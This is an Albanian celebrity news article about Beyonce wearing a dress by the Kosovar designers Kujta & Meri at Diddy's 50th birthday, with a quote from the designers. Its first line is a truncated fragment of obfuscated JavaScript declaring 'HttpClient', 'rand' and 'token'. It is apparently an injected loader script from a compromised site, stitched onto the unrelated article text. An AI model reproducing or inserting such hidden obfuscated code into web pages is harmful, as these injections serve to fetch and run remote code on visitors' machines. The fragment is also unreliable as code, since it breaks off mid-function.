;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Besoni ose jo, Beyonce zgjedhë të vishet nga këta kreatorë kosovarë

By

Kreatorët shqiptarë ka tash e një kohë që i kanë kaluar kufijtë duke qenë zgjedhja e shumë personazheve të rëndësishme botërore në evente të mëdha.

Mirëpo, deri sot askush nuk ka mbërritur tek Beyonce. Një gjë e tillë duket të ketë qenë thjesht çështje kohe deri në triumfin e Kujtës dhe Merit. Besoni ose jo, çifti kosovar që janë të njohur prej shumë vitesh me punën e tyre kanë arritur të veshin me kreacion ikonën botërore, Beyonce Knowles.

Super ylli botëror ka veshur fustanin e kreatorëve kosovarë në festën e ditëlindjes së 50-të të Diddy-t ku pozoi me bashkëshortin, Jay Z.

Nga mediat botërore përfshirë Daily Mail, paraqitja e Beyonces me këtë fustan është lavdëruar goxha.

Sakaq, mbi lajmin kanë folur vetë Kujta dhe Meri përmes një postimi ku shprehen:

‘Ishte 4 e mëngjesit dhe ne po punonim me entuzazëm dhe emocion në fustanin përallor të Beyonce. Ajo pati shumë besim tek ne dhe na la të lirë për të krijuar më të mirën për të. Ishte një përgjegjësi e madhe për të krijuar për divën’

Një ëndërr e bërë realitet për Kujtën dhe Merin dhe një krenari pa dyshim për secilin prej nesh për suksesin në botë të shqiptarëve në çdo fushë! /Prive.al

 

View this post on Instagram

 

BEYONCE @beyonce in @kujtameri KUJTA&MERI #beyonce #kujtameri

A post shared by Kujta & Meri (@kujtameri) on

Artikuj të ngjashëm